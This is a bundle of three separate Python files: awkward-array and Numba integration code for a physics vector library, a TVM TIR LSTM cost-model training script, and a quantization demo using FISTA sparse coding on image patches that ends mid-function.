behavior[numpy.square, "Vector3D"] = lambda v: v.mag2
behavior[numpy.square, "Vector4D"] = lambda v: v.tau2
behavior[numpy.square, "Momentum2D"] = lambda v: v.rho2
behavior[numpy.square, "Momentum3D"] = lambda v: v.mag2
behavior[numpy.square, "Momentum4D"] = lambda v: v.tau2
# numpy.sqrt(v) == sqrt(|v|), computed from the squared magnitude: (|v|**2) ** 0.25.
behavior[numpy.sqrt, "Vector2D"] = lambda v: v.rho2 ** 0.25
behavior[numpy.sqrt, "Vector3D"] = lambda v: v.mag2 ** 0.25
behavior[numpy.sqrt, "Vector4D"] = lambda v: v.tau2 ** 0.25
behavior[numpy.sqrt, "Momentum2D"] = lambda v: v.rho2 ** 0.25
behavior[numpy.sqrt, "Momentum3D"] = lambda v: v.mag2 ** 0.25
behavior[numpy.sqrt, "Momentum4D"] = lambda v: v.tau2 ** 0.25
# numpy.cbrt(v) == |v| ** (1/3), computed as (|v|**2) ** (1/6).
behavior[numpy.cbrt, "Vector2D"] = lambda v: v.rho2 ** 0.16666666666666666
behavior[numpy.cbrt, "Vector3D"] = lambda v: v.mag2 ** 0.16666666666666666
behavior[numpy.cbrt, "Vector4D"] = lambda v: v.tau2 ** 0.16666666666666666
behavior[numpy.cbrt, "Momentum2D"] = lambda v: v.rho2 ** 0.16666666666666666
behavior[numpy.cbrt, "Momentum3D"] = lambda v: v.mag2 ** 0.16666666666666666
behavior[numpy.cbrt, "Momentum4D"] = lambda v: v.tau2 ** 0.16666666666666666
# v ** expo: takes the squared-magnitude shortcut when expo == 2.
behavior[numpy.power, "Vector2D", numbers.Real] = (
    lambda v, expo: v.rho2 if expo == 2 else v.rho ** expo
)
behavior[numpy.power, "Vector3D", numbers.Real] = (
    lambda v, expo: v.mag2 if expo == 2 else v.mag ** expo
)
behavior[numpy.power, "Vector4D", numbers.Real] = (
    lambda v, expo: v.tau2 if expo == 2 else v.tau ** expo
)
behavior[numpy.power, "Momentum2D", numbers.Real] = (
    lambda v, expo: v.rho2 if expo == 2 else v.rho ** expo
)
behavior[numpy.power, "Momentum3D", numbers.Real] = (
    lambda v, expo: v.mag2 if expo == 2 else v.mag ** expo
)
behavior[numpy.power, "Momentum4D", numbers.Real] = (
    lambda v, expo: v.tau2 if expo == 2 else v.tau ** expo
)
# Casting NumPy-backend vectors into the awkward backend via vector.Array.
behavior["__cast__", VectorNumpy2D] = lambda v: vector.Array(v)
behavior["__cast__", VectorNumpy3D] = lambda v: vector.Array(v)
behavior["__cast__", VectorNumpy4D] = lambda v: vector.Array(v)
# Register binary ufuncs (add, subtract, matmul->dot, equal, not_equal) for
# every pairing of awkward record names with each other and with the
# object-backend vector classes.
for left in (
    "Vector2D",
    "Vector3D",
    "Vector4D",
    "Momentum2D",
    "Momentum3D",
    "Momentum4D",
    VectorObject2D,
    VectorObject3D,
    VectorObject4D,
):
    for right in (
        "Vector2D",
        "Vector3D",
        "Vector4D",
        "Momentum2D",
        "Momentum3D",
        "Momentum4D",
        VectorObject2D,
        VectorObject3D,
        VectorObject4D,
    ):
        # Skip pairs where BOTH operands are object-backend classes --
        # presumably those dispatch outside the awkward behavior table
        # (TODO confirm against the object backend).
        if not (isinstance(left, type) and isinstance(right, type)):
            behavior[numpy.add, left, right] = lambda v1, v2: v1.add(v2)
            behavior[numpy.subtract, left, right] = lambda v1, v2: v1.subtract(v2)
            behavior[numpy.matmul, left, right] = lambda v1, v2: v1.dot(v2)
            behavior[numpy.equal, left, right] = lambda v1, v2: v1.equal(v2)
            behavior[numpy.not_equal, left, right] = lambda v1, v2: v1.not_equal(v2)
# Scalar operations per record name: scaling (both operand orders), negation,
# unary plus, and division by a real scalar (implemented as scale by 1/denom).
for name in (
    "Vector2D",
    "Vector3D",
    "Vector4D",
    "Momentum2D",
    "Momentum3D",
    "Momentum4D",
):
    behavior[numpy.multiply, name, numbers.Real] = lambda v, factor: v.scale(factor)
    behavior[numpy.multiply, numbers.Real, name] = lambda factor, v: v.scale(factor)
    behavior[numpy.negative, name] = lambda v: v.scale(-1)
    behavior[numpy.positive, name] = lambda v: v
    behavior[numpy.true_divide, name, numbers.Real] = lambda v, denom: v.scale(
        1 / denom
    )
# class object cross-references ###############################################
# Each concrete class records its 2D/3D/4D projection targets.  Momentum
# classes project to momentum classes, but their GenericClass points at the
# plain Vector class of the same backend and dimension.
# 2D
VectorArray2D.ProjectionClass2D = VectorArray2D
VectorArray2D.ProjectionClass3D = VectorArray3D
VectorArray2D.ProjectionClass4D = VectorArray4D
VectorArray2D.GenericClass = VectorArray2D
VectorRecord2D.ProjectionClass2D = VectorRecord2D
VectorRecord2D.ProjectionClass3D = VectorRecord3D
VectorRecord2D.ProjectionClass4D = VectorRecord4D
VectorRecord2D.GenericClass = VectorRecord2D
MomentumArray2D.ProjectionClass2D = MomentumArray2D
MomentumArray2D.ProjectionClass3D = MomentumArray3D
MomentumArray2D.ProjectionClass4D = MomentumArray4D
MomentumArray2D.GenericClass = VectorArray2D
MomentumRecord2D.ProjectionClass2D = MomentumRecord2D
MomentumRecord2D.ProjectionClass3D = MomentumRecord3D
MomentumRecord2D.ProjectionClass4D = MomentumRecord4D
MomentumRecord2D.GenericClass = VectorRecord2D
# 3D
VectorArray3D.ProjectionClass2D = VectorArray2D
VectorArray3D.ProjectionClass3D = VectorArray3D
VectorArray3D.ProjectionClass4D = VectorArray4D
VectorArray3D.GenericClass = VectorArray3D
VectorRecord3D.ProjectionClass2D = VectorRecord2D
VectorRecord3D.ProjectionClass3D = VectorRecord3D
VectorRecord3D.ProjectionClass4D = VectorRecord4D
VectorRecord3D.GenericClass = VectorRecord3D
MomentumArray3D.ProjectionClass2D = MomentumArray2D
MomentumArray3D.ProjectionClass3D = MomentumArray3D
MomentumArray3D.ProjectionClass4D = MomentumArray4D
MomentumArray3D.GenericClass = VectorArray3D
MomentumRecord3D.ProjectionClass2D = MomentumRecord2D
MomentumRecord3D.ProjectionClass3D = MomentumRecord3D
MomentumRecord3D.ProjectionClass4D = MomentumRecord4D
MomentumRecord3D.GenericClass = VectorRecord3D
# 4D
VectorArray4D.ProjectionClass2D = VectorArray2D
VectorArray4D.ProjectionClass3D = VectorArray3D
VectorArray4D.ProjectionClass4D = VectorArray4D
VectorArray4D.GenericClass = VectorArray4D
VectorRecord4D.ProjectionClass2D = VectorRecord2D
VectorRecord4D.ProjectionClass3D = VectorRecord3D
VectorRecord4D.ProjectionClass4D = VectorRecord4D
VectorRecord4D.GenericClass = VectorRecord4D
MomentumArray4D.ProjectionClass2D = MomentumArray2D
MomentumArray4D.ProjectionClass3D = MomentumArray3D
MomentumArray4D.ProjectionClass4D = MomentumArray4D
MomentumArray4D.GenericClass = VectorArray4D
MomentumRecord4D.ProjectionClass2D = MomentumRecord2D
MomentumRecord4D.ProjectionClass3D = MomentumRecord3D
MomentumRecord4D.ProjectionClass4D = MomentumRecord4D
MomentumRecord4D.GenericClass = VectorRecord4D
# implementation of behaviors in Numba ########################################
def _aztype_of(recordarraytype: typing.Any, is_momentum: bool) -> typing.Any:
    """Infer the numba type of the azimuthal coordinate pair stored in
    ``recordarraytype``.

    Momentum synonyms ("px"/"py"/"pt") are probed first when ``is_momentum``;
    a Cartesian x/y pair takes precedence over rho/phi.  Raises
    ``numba.TypingError`` when no complete azimuthal pair is present.
    """
    import numba
    cls: typing.Union[
        typing.Type[AzimuthalObjectXY],
        typing.Type[AzimuthalObjectRhoPhi],
    ]
    x_index = None
    y_index = None
    rho_index = None
    phi_index = None
    # Momentum records may spell x as "px"; fall back to the generic name.
    if is_momentum:
        try:
            x_index = recordarraytype.recordlookup.index("px")
        except ValueError:
            x_index = None
    if x_index is None:
        try:
            x_index = recordarraytype.recordlookup.index("x")
        except ValueError:
            x_index = None
    if is_momentum:
        try:
            y_index = recordarraytype.recordlookup.index("py")
        except ValueError:
            y_index = None
    if y_index is None:
        try:
            y_index = recordarraytype.recordlookup.index("y")
        except ValueError:
            y_index = None
    # rho may be spelled "pt" (transverse momentum) on momentum records.
    if is_momentum:
        try:
            rho_index = recordarraytype.recordlookup.index("pt")
        except ValueError:
            rho_index = None
    if rho_index is None:
        try:
            rho_index = recordarraytype.recordlookup.index("rho")
        except ValueError:
            rho_index = None
    try:
        phi_index = recordarraytype.recordlookup.index("phi")
    except ValueError:
        phi_index = None
    # Prefer the Cartesian pair if both representations happen to be present.
    if x_index is not None and y_index is not None:
        coord1 = recordarraytype.contenttypes[x_index].arraytype.dtype
        coord2 = recordarraytype.contenttypes[y_index].arraytype.dtype
        cls = AzimuthalObjectXY
    elif rho_index is not None and phi_index is not None:
        coord1 = recordarraytype.contenttypes[rho_index].arraytype.dtype
        coord2 = recordarraytype.contenttypes[phi_index].arraytype.dtype
        cls = AzimuthalObjectRhoPhi
    elif is_momentum:
        raise numba.TypingError(
            f"{recordarraytype} is missing azimuthal fields: px/py (x/y) or pt/phi (rho/phi)"
        )
    else:
        raise numba.TypingError(
            f"{recordarraytype} is missing azimuthal fields: x/y or rho/phi"
        )
    # Materialize a zero-valued coordinate object and take its numba type.
    return numba.typeof(cls(coord1.cast_python_value(0), coord2.cast_python_value(0)))
def _ltype_of(recordarraytype: typing.Any, is_momentum: bool) -> typing.Any:
    """Infer the numba type of the longitudinal coordinate stored in
    ``recordarraytype``.

    The "pz" momentum synonym is probed first when ``is_momentum``; z takes
    precedence over theta, which takes precedence over eta.  Raises
    ``numba.TypingError`` when no longitudinal field is present.
    """
    import numba

    cls: typing.Union[
        typing.Type[LongitudinalObjectZ],
        typing.Type[LongitudinalObjectTheta],
        typing.Type[LongitudinalObjectEta],
    ]

    def lookup(field_name: str) -> typing.Any:
        # Position of the field in the record, or None when absent.
        try:
            return recordarraytype.recordlookup.index(field_name)
        except ValueError:
            return None

    z_index = lookup("pz") if is_momentum else None
    if z_index is None:
        z_index = lookup("z")
    theta_index = lookup("theta")
    eta_index = lookup("eta")

    if z_index is not None:
        coord1 = recordarraytype.contenttypes[z_index].arraytype.dtype
        cls = LongitudinalObjectZ
    elif theta_index is not None:
        coord1 = recordarraytype.contenttypes[theta_index].arraytype.dtype
        cls = LongitudinalObjectTheta
    elif eta_index is not None:
        coord1 = recordarraytype.contenttypes[eta_index].arraytype.dtype
        cls = LongitudinalObjectEta
    elif is_momentum:
        raise numba.TypingError(
            f"{recordarraytype} is missing longitudinal fields: pz (z) or theta or eta"
        )
    else:
        raise numba.TypingError(
            f"{recordarraytype} is missing longitudinal fields: z or theta or eta"
        )
    # Materialize a zero-valued coordinate object and take its numba type.
    return numba.typeof(cls(coord1.cast_python_value(0)))
def _ttype_of(recordarraytype: typing.Any, is_momentum: bool) -> typing.Any:
    """Infer the numba type of the temporal coordinate stored in
    ``recordarraytype``.

    Momentum synonyms for t ("E", "e", "energy") and for tau ("M", "m",
    "mass") are probed first when ``is_momentum``; t takes precedence over
    tau.  Raises ``numba.TypingError`` when no temporal field is present.
    """
    import numba
    cls: typing.Union[
        typing.Type[TemporalObjectT],
        typing.Type[TemporalObjectTau],
    ]
    t_index = None
    tau_index = None
    # Energy spellings, tried in order: E, e, energy; then the generic "t".
    if is_momentum:
        try:
            t_index = recordarraytype.recordlookup.index("E")
        except ValueError:
            t_index = None
    if is_momentum and t_index is None:
        try:
            t_index = recordarraytype.recordlookup.index("e")
        except ValueError:
            t_index = None
    if is_momentum and t_index is None:
        try:
            t_index = recordarraytype.recordlookup.index("energy")
        except ValueError:
            t_index = None
    if t_index is None:
        try:
            t_index = recordarraytype.recordlookup.index("t")
        except ValueError:
            t_index = None
    # Mass spellings, tried in order: M, m, mass; then the generic "tau".
    if is_momentum:
        try:
            tau_index = recordarraytype.recordlookup.index("M")
        except ValueError:
            tau_index = None
    if is_momentum and tau_index is None:
        try:
            tau_index = recordarraytype.recordlookup.index("m")
        except ValueError:
            tau_index = None
    if is_momentum and tau_index is None:
        try:
            tau_index = recordarraytype.recordlookup.index("mass")
        except ValueError:
            tau_index = None
    if tau_index is None:
        try:
            tau_index = recordarraytype.recordlookup.index("tau")
        except ValueError:
            tau_index = None
    if t_index is not None:
        coord1 = recordarraytype.contenttypes[t_index].arraytype.dtype
        cls = TemporalObjectT
    elif tau_index is not None:
        coord1 = recordarraytype.contenttypes[tau_index].arraytype.dtype
        cls = TemporalObjectTau
    elif is_momentum:
        raise numba.TypingError(
            f"{recordarraytype} is missing temporal fields: E/e/energy (t) or M/m/mass (tau)"
        )
    else:
        raise numba.TypingError(
            f"{recordarraytype} is missing temporal fields: t or tau"
        )
    # Materialize a zero-valued coordinate object and take its numba type.
    return numba.typeof(cls(coord1.cast_python_value(0)))
def _numba_typer_Vector2D(viewtype: typing.Any) -> typing.Any:
    """Numba typing hook: map a "Vector2D" record view to VectorObject2DType."""
    import vector._backends.numba_object
    # These clearly exist, a bug somewhere, but ignoring them for now
    return vector._backends.numba_object.VectorObject2DType(  # type: ignore
        _aztype_of(viewtype.arrayviewtype.type, False)
    )
def _numba_typer_Vector3D(viewtype: typing.Any) -> typing.Any:
    """Numba typing hook: map a "Vector3D" record view to VectorObject3DType."""
    import vector._backends.numba_object
    return vector._backends.numba_object.VectorObject3DType(  # type: ignore
        _aztype_of(viewtype.arrayviewtype.type, False),
        _ltype_of(viewtype.arrayviewtype.type, False),
    )
def _numba_typer_Vector4D(viewtype: typing.Any) -> typing.Any:
    """Numba typing hook: map a "Vector4D" record view to VectorObject4DType."""
    import vector._backends.numba_object
    return vector._backends.numba_object.VectorObject4DType(  # type: ignore
        _aztype_of(viewtype.arrayviewtype.type, False),
        _ltype_of(viewtype.arrayviewtype.type, False),
        _ttype_of(viewtype.arrayviewtype.type, False),
    )
def _numba_typer_Momentum2D(viewtype: typing.Any) -> typing.Any:
    """Numba typing hook for "Momentum2D" views (momentum field synonyms on)."""
    import vector._backends.numba_object
    return vector._backends.numba_object.MomentumObject2DType(  # type: ignore
        _aztype_of(viewtype.arrayviewtype.type, True)
    )
def _numba_typer_Momentum3D(viewtype: typing.Any) -> typing.Any:
    """Numba typing hook for "Momentum3D" views (momentum field synonyms on)."""
    import vector._backends.numba_object
    return vector._backends.numba_object.MomentumObject3DType(  # type: ignore
        _aztype_of(viewtype.arrayviewtype.type, True),
        _ltype_of(viewtype.arrayviewtype.type, True),
    )
def _numba_typer_Momentum4D(viewtype: typing.Any) -> typing.Any:
    """Numba typing hook for "Momentum4D" views (momentum field synonyms on)."""
    import vector._backends.numba_object
    return vector._backends.numba_object.MomentumObject4DType(  # type: ignore
        _aztype_of(viewtype.arrayviewtype.type, True),
        _ltype_of(viewtype.arrayviewtype.type, True),
        _ttype_of(viewtype.arrayviewtype.type, True),
    )
def _numba_lower(
    context: typing.Any, builder: typing.Any, sig: typing.Any, args: typing.Any
) -> typing.Any:
    """Numba lowering: compile a constructor that turns an awkward record view
    into the object-backend vector named by ``sig.return_type``.

    The field-reader functions are selected at compile time from the record's
    actual field names (generic names vs momentum synonyms), then a small
    ``impl`` closure assembling the vector is compiled with numba.
    """
    from vector._backends.numba_object import (  # type: ignore
        _awkward_numba_E,
        _awkward_numba_e,
        _awkward_numba_energy,
        _awkward_numba_eta,
        _awkward_numba_M,
        _awkward_numba_m,
        _awkward_numba_mass,
        _awkward_numba_ptphi,
        _awkward_numba_pxpy,
        _awkward_numba_pxy,
        _awkward_numba_pz,
        _awkward_numba_rhophi,
        _awkward_numba_t,
        _awkward_numba_tau,
        _awkward_numba_theta,
        _awkward_numba_xpy,
        _awkward_numba_xy,
        _awkward_numba_z,
    )
    vectorcls = sig.return_type.instance_class
    fields = sig.args[0].arrayviewtype.type.recordlookup
    # NOTE(review): the selections below assume the coordinate types on
    # sig.return_type match one of the known subclasses; an unmatched
    # combination would leave azimuthal/longitudinal/temporal unbound --
    # presumably guaranteed by the typer functions above (confirm).
    if issubclass(vectorcls, (VectorObject2D, VectorObject3D, VectorObject4D)):
        # Azimuthal reader: one dedicated function per generic/momentum
        # field-name combination.
        if issubclass(sig.return_type.azimuthaltype.instance_class, AzimuthalXY):
            if "x" in fields and "y" in fields:
                azimuthal = _awkward_numba_xy
            elif "x" in fields and "py" in fields:
                azimuthal = _awkward_numba_xpy
            elif "px" in fields and "y" in fields:
                azimuthal = _awkward_numba_pxy
            elif "px" in fields and "py" in fields:
                azimuthal = _awkward_numba_pxpy
            else:
                raise AssertionError
        elif issubclass(sig.return_type.azimuthaltype.instance_class, AzimuthalRhoPhi):
            if "rho" in fields and "phi" in fields:
                azimuthal = _awkward_numba_rhophi
            elif "pt" in fields and "phi" in fields:
                azimuthal = _awkward_numba_ptphi
            else:
                raise AssertionError
    if issubclass(vectorcls, (VectorObject3D, VectorObject4D)):
        # Longitudinal reader: z/pz, theta, or eta.
        if issubclass(sig.return_type.longitudinaltype.instance_class, LongitudinalZ):
            if "z" in fields:
                longitudinal = _awkward_numba_z
            elif "pz" in fields:
                longitudinal = _awkward_numba_pz
            else:
                raise AssertionError
        elif issubclass(
            sig.return_type.longitudinaltype.instance_class, LongitudinalTheta
        ):
            longitudinal = _awkward_numba_theta
        elif issubclass(
            sig.return_type.longitudinaltype.instance_class, LongitudinalEta
        ):
            longitudinal = _awkward_numba_eta
    if issubclass(vectorcls, VectorObject4D):
        # Temporal reader: t/E/e/energy or tau/M/m/mass.
        if issubclass(sig.return_type.temporaltype.instance_class, TemporalT):
            if "t" in fields:
                temporal = _awkward_numba_t
            elif "E" in fields:
                temporal = _awkward_numba_E
            elif "e" in fields:
                temporal = _awkward_numba_e
            elif "energy" in fields:
                temporal = _awkward_numba_energy
            else:
                raise AssertionError
        elif issubclass(sig.return_type.temporaltype.instance_class, TemporalTau):
            if "tau" in fields:
                temporal = _awkward_numba_tau
            elif "M" in fields:
                temporal = _awkward_numba_M
            elif "m" in fields:
                temporal = _awkward_numba_m
            elif "mass" in fields:
                temporal = _awkward_numba_mass
            else:
                raise AssertionError
    # Build the constructor matching the target dimensionality.
    if issubclass(vectorcls, VectorObject2D):
        def impl(record: typing.Any) -> typing.Any:
            return vectorcls(azimuthal(record))
    elif issubclass(vectorcls, VectorObject3D):
        def impl(record: typing.Any) -> typing.Any:
            return vectorcls(azimuthal(record), longitudinal(record))
    elif issubclass(vectorcls, VectorObject4D):
        def impl(record: typing.Any) -> typing.Any:
            return vectorcls(azimuthal(record), longitudinal(record), temporal(record))
    return context.compile_internal(builder, impl, sig, args)
# Hook the typing and lowering functions into awkward's numba integration for
# each vector record name; one shared lowering handles all six.
ak.behavior["__numba_typer__", "Vector2D"] = _numba_typer_Vector2D
ak.behavior["__numba_typer__", "Vector3D"] = _numba_typer_Vector3D
ak.behavior["__numba_typer__", "Vector4D"] = _numba_typer_Vector4D
ak.behavior["__numba_typer__", "Momentum2D"] = _numba_typer_Momentum2D
ak.behavior["__numba_typer__", "Momentum3D"] = _numba_typer_Momentum3D
ak.behavior["__numba_typer__", "Momentum4D"] = _numba_typer_Momentum4D
ak.behavior["__numba_lower__", "Vector2D"] = _numba_lower
ak.behavior["__numba_lower__", "Vector3D"] = _numba_lower
ak.behavior["__numba_lower__", "Vector4D"] = _numba_lower
ak.behavior["__numba_lower__", "Momentum2D"] = _numba_lower
ak.behavior["__numba_lower__", "Momentum3D"] = _numba_lower
ak.behavior["__numba_lower__", "Momentum4D"] = _numba_lower
|
<gh_stars>0
import tvm
from tir_dataset import TIRPrograms
import sqlite3_dataset
import torch
from torch import nn
from torch.utils.data import DataLoader
import torch.optim as optim
import torch.autograd.profiler as profiler
import numpy as np
import cProfile
device = torch.device("cuda")
class TokenEmbedding(nn.Module):
    """Embed (value, kind) token pairs into a 180-wide vector.

    Each token row is ``(value, kind)``: kind 0 = builtin, kind 1 = variable,
    kind 2 = numeric literal (inferred from the three branches below -- TODO
    confirm against the TVM tokenizer).  Builtins and variables receive a
    learned 179-dim embedding plus a flag in the final slot; numeric tokens
    get a zero embedding with the raw value stored in the final slot.
    """

    def __init__(self):
        super(TokenEmbedding, self).__init__()
        self.embedding_dim = 179
        # Separate tables: 122 distinct builtin tokens, up to 10000 variables.
        self.builtin_embedding = nn.Embedding(122, self.embedding_dim, device=device)
        self.variable_embedding = nn.Embedding(
            10000, self.embedding_dim, device=device
        )  # max 100 variables?

    def forward(self, tokens):
        # One output row per token: embedding_dim learned slots + 1 extra slot
        # holding a kind flag (builtins/variables) or the literal value (numbers).
        out = torch.zeros(tokens.shape[0], self.embedding_dim + 1, device=device)
        is_builtin = tokens[:, 1] == 0
        out[is_builtin, : self.embedding_dim] = self.builtin_embedding(tokens[is_builtin, 0])
        out[is_builtin, self.embedding_dim] = -1
        is_variable = tokens[:, 1] == 1
        out[is_variable, : self.embedding_dim] = self.variable_embedding(tokens[is_variable, 0])
        # NOTE(review): builtins and variables share flag -1; confirm variables
        # were not meant to get a distinct flag (e.g. +1).
        out[is_variable, self.embedding_dim] = -1
        # BUG FIX: numeric tokens are kind 2.  The original tested `== 1`,
        # which re-selected the variable rows, zeroed their embeddings, and
        # overwrote the flag with the raw token value -- and numeric tokens
        # were never handled at all.
        is_number = tokens[:, 1] == 2
        out[is_number, : self.embedding_dim] = 0
        out[is_number, self.embedding_dim] = tokens[is_number, 0].float()
        return out
class LSTMPredictor(nn.Module):
    """Recursive TIR cost model: statement token sequences are reduced with a
    statement LSTM, loop bodies are folded through a loop LSTM, and a final
    MLP maps the root state to a scalar predicted cost."""
    def __init__(self):
        super(LSTMPredictor, self).__init__()
        self.token_embedding = TokenEmbedding()
        self.hidden_stmt_size = 180
        self.hidden_loop_size = 180
        # Input width is the embedding plus its one flag/value slot (179 + 1).
        self.stmt_reducer = nn.LSTM(
            self.token_embedding.embedding_dim + 1, self.hidden_stmt_size, device=device
        )
        self.stmt_ff = nn.Sequential(nn.Linear(180, 180), nn.ELU())
        self.loop_reducer = nn.LSTM(
            self.token_embedding.embedding_dim + 1, self.hidden_loop_size, device=device
        )
        self.loop_ff = nn.Sequential(nn.Linear(180, 180), nn.ELU())
        # TVM packed function that flattens a TIR statement into tokens.
        self.tokenize_fn = tvm.get_global_func("tir.analysis.tokenize_stmt")()
        self.ff_final = nn.Sequential(
            nn.Linear(180, 90),
            nn.ELU(),
            nn.Linear(90, 1),
        )
    def tokenize(self, ast):
        # Tokens as a numpy array; presumably shape (num_tokens, 2) of
        # (value, kind) pairs as consumed by TokenEmbedding -- TODO confirm.
        return self.tokenize_fn(ast).asnumpy()
    def tokenize_for(self, f):
        # TODO: missing for kind
        # Embed the loop header: its min, extent, and loop variable tokens.
        tokens = np.concatenate(
            [self.tokenize(f.min), self.tokenize(f.extent), self.tokenize(f.loop_var)]
        )
        return self.token_embedding(torch.as_tensor(tokens, device=next(self.parameters()).device))
    def visit(self, ast):
        # Recursively reduce a TIR statement tree to a single hidden vector
        # (or a list of them, for SeqStmt).
        if isinstance(ast, tvm.tir.stmt.For):
            children = self.visit(ast.body)
            embedded = self.tokenize_for(ast)
            # Seed the loop LSTM with the loop header tokens...
            y, hidden = self.loop_reducer(embedded.view(embedded.shape[0], 1, embedded.shape[1]))
            y = hidden[0]
            # ...then fold each child state through the same LSTM.
            # NOTE(review): children may be a single tensor rather than a list
            # when the body is one statement; iterating it then walks its
            # first axis -- confirm this is intended.
            for x in children:
                y, hidden = self.loop_reducer(x.view(x.shape[0], 1, -1), hidden)
            x = self.loop_ff(hidden[0])
            return x
        if isinstance(ast, tvm.tir.stmt.Allocate):
            # TODO: include this information?
            return self.visit(ast.body)
        if isinstance(ast, tvm.tir.stmt.AttrStmt):
            # TODO: include this information?
            return self.visit(ast.body)
        if isinstance(ast, tvm.tir.stmt.SeqStmt):
            return [self.visit(x) for x in ast.seq]
        # Leaf statement: embed its tokens and reduce with the statement LSTM.
        embedded = self.token_embedding(
            torch.as_tensor(self.tokenize(ast), device=next(self.parameters()).device)
        )
        out, hidden = self.stmt_reducer(embedded.view(embedded.shape[0], 1, embedded.shape[1]))
        x = self.stmt_ff(out)
        return x
    def forward(self, ast):
        x = self.visit(ast.body)
        # TODO: figure out a better way to handle this
        # A top-level SeqStmt yields a list; fold it with a fresh loop-LSTM state.
        if isinstance(x, list):
            y = None
            hidden = (
                torch.zeros(1, 1, self.hidden_loop_size, device=device),
                torch.zeros(1, 1, self.hidden_loop_size, device=device),
            )
            for z in x:
                y, hidden = self.loop_reducer(z, hidden)
            return self.ff_final(y.reshape(-1, self.hidden_loop_size))
        return self.ff_final(x.reshape(-1, self.hidden_loop_size))
def train(model):
    """Fit `model` on the sqlite TIR dataset with SGD + MSE loss, accumulating
    gradients over batches of 16 consecutive programs (one program per forward
    pass; optimizer steps once per batch)."""
    dataset = sqlite3_dataset.TIRPrograms(
        "dataset_cpu.db", "dataset_cpu/network_info/all_tasks.pkl"
    )
    loss = nn.MSELoss()
    optimizer = optim.SGD(model.parameters(), lr=1e-4)
    batch_size = 16
    for epoch in range(50):
        for i, ((target, tir), cost) in enumerate(dataset.iterate()):
            # Zero at the start of each accumulation window...
            if i % batch_size == 0:
                optimizer.zero_grad()
            predicted_cost = model(tir)
            d = loss(predicted_cost, torch.tensor([[cost]], dtype=torch.float32, device=device))
            print(f"{i:10}{predicted_cost[0,0,0]:10.2e}{cost:10.2e}{d.item():10.2e}")
            d.backward()
            # ...and step once the window is full.
            if i % batch_size == batch_size - 1:
                optimizer.step()
            # if i % 100 == 0:
            # with torch.no_grad():
            # (target, tir), cost = dataset[0]
            # predicted_cost = model(tir)
            # print(predicted_cost, cost)
class SingleLayerLSTM(nn.Module):
    """Baseline cost model: tokenize the whole TIR body as one flat sequence,
    run a single LSTM over it, and map the final hidden state to a scalar."""
    def __init__(self):
        super(SingleLayerLSTM, self).__init__()
        self.embedding = TokenEmbedding()
        # 180 = TokenEmbedding.embedding_dim (179) + 1 flag/value slot.
        self.lstm = nn.LSTM(180, 180)
        self.ff = nn.Sequential(
            nn.Linear(180, 80),
            nn.ELU(),
            nn.Linear(80, 1),
        )
        # TVM packed function that flattens a TIR statement into tokens.
        self.tokenize_fn = tvm.get_global_func("tir.analysis.tokenize_stmt")()
    def forward(self, ast):
        tks = self.tokenize_fn(ast.body).asnumpy()
        embedded = self.embedding(torch.as_tensor(tks, device=device))
        # Sequence-first layout: (seq_len, batch=1, features).
        out, hidden = self.lstm(embedded.view(-1, 1, embedded.shape[1]))
        # Final hidden state summarizes the whole program.
        return self.ff(hidden[0])
if __name__ == "__main__":
    # Earlier experiments kept for reference (pickle-based loading and the
    # recursive LSTMPredictor):
    # progs = TIRPrograms("dataset_cpu/network_info/all_tasks.pkl", "dataset_cpu/measure_records")
    # (target, tir), cost = progs[0]
    # import pickle
    # tir = pickle.load(open("tir_program.pkl", "rb"))
    # model = LSTMPredictor()
    # print(model(tir))
    # model = LSTMPredictor().cuda()
    model = SingleLayerLSTM().cuda()
    train(model)
|
<filename>generalized_lloyd_quantization/demo-dict.py
import os
import time
import pickle
import torch
import numpy as np
from matplotlib import pyplot as plt
from null_uniform import compute_quantization as uni
from generalized_lloyd_LBG import compute_quantization as gl
from optimal_generalized_lloyd_LBG import compute_quantization as opt_gl_numpy
from optimal_generalized_lloyd_LBG import calculate_assignment_probabilites
from optimal_generalized_lloyd_LBG_torch import compute_quantization as opt_gl_torch
from utils.clustering import get_clusters
from analysis_transforms import fista
# Input data: a learned sparse-coding dictionary and the centered image
# patches it was trained on.
dict_file = '../../../data/sc_dictionary_8x8_lamda0point1_Field.p'
data_file = '../../../data/two_million_unwhite_centered_patches_8x8.p'
# Parameters for FISTA
patch_dimensions = (8, 8)
sparsity_param = 0.1
fista_device = 'cuda:1'
torch.cuda.set_device(1)
patch_dataset = pickle.load(open(data_file, 'rb'))
# Flatten the batched patches into one (pixels, num_patches) matrix.
zero_mean_patches = np.transpose(
    patch_dataset['batched_patches'], (0, 2, 1)).reshape(
    (-1, patch_dimensions[0]*patch_dimensions[1])).T
img_patch_comp_means = patch_dataset['original_patch_means']
sc_dictionary = pickle.load(open(dict_file, 'rb'))
print('running FISTA')
# Sparse-code every patch against the dictionary (1000 FISTA iterations).
raw_sc_codes = fista.run(
    torch.from_numpy(zero_mean_patches).to(fista_device),
    torch.from_numpy(sc_dictionary).to(fista_device), sparsity_param, 1000).cpu().numpy()
#^ now samples index first dim, code coefficients in second dim
print('done')
torch.cuda.empty_cache()
Y = zero_mean_patches.T #(d,n)
A = sc_dictionary # (n,n)
X = raw_sc_codes.T # (d,n)
# Note: Y.T = A@X.T
# Use only some X
X = X[:50000]
# Parameters for quant-computation
quant_method = 'opt_lloyd'
lagrange_mult = 1.
num_bins = 40
num_clusters = 60
clustering_algo = 'stoer_wagner'
quant_device = 'numpy'
# torch.cuda.set_device(1)
def compute_quantization_wrapper(data, quant_method='uni', clusters=None,
                                 binwidth=1, placement_scheme='on_mean',
                                 lagrange_mult=1., nn_method='brute_break',
                                 device='cpu'):
  """
  Quantize `data` cluster-by-cluster with the chosen quantization method.

  Parameters
  data: ndarray; rows are samples, columns are the n code dimensions
    (data.shape[1] is used as the dimensionality below)
  quant_method: str {'uni', 'lloyd', 'opt_lloyd'}
  clusters: [cluster1, cluster2, ...] where cluster1 = [idx_1, idx_2, ...];
    defaults to a single cluster holding every dimension
  binwidth: float or ndarray(n)
  placement_scheme: str {'on_mode', 'on_median', 'on_mean', 'on_zero'}
  lagrange_mult: float (rate/distortion trade-off, opt_lloyd only)
  nn_method: str {'brute_np', 'brute_scipy', 'brute_break', 'kdtree'}
  device: str {'numpy', 'cpu', 'cuda', ...}; 'numpy' skips torch entirely
  Returns
  a_pts, c_ass, MSE, rate
  (per-cluster lists of assignment points and code assignments; MSE and rate
  are summed over clusters)
  """
  data_dim = data.shape[1]
  if clusters is None:
    clusters = [list(range(data_dim))]
  if isinstance(binwidth, np.ndarray):
    assert(binwidth.shape == (data_dim,))
  else:
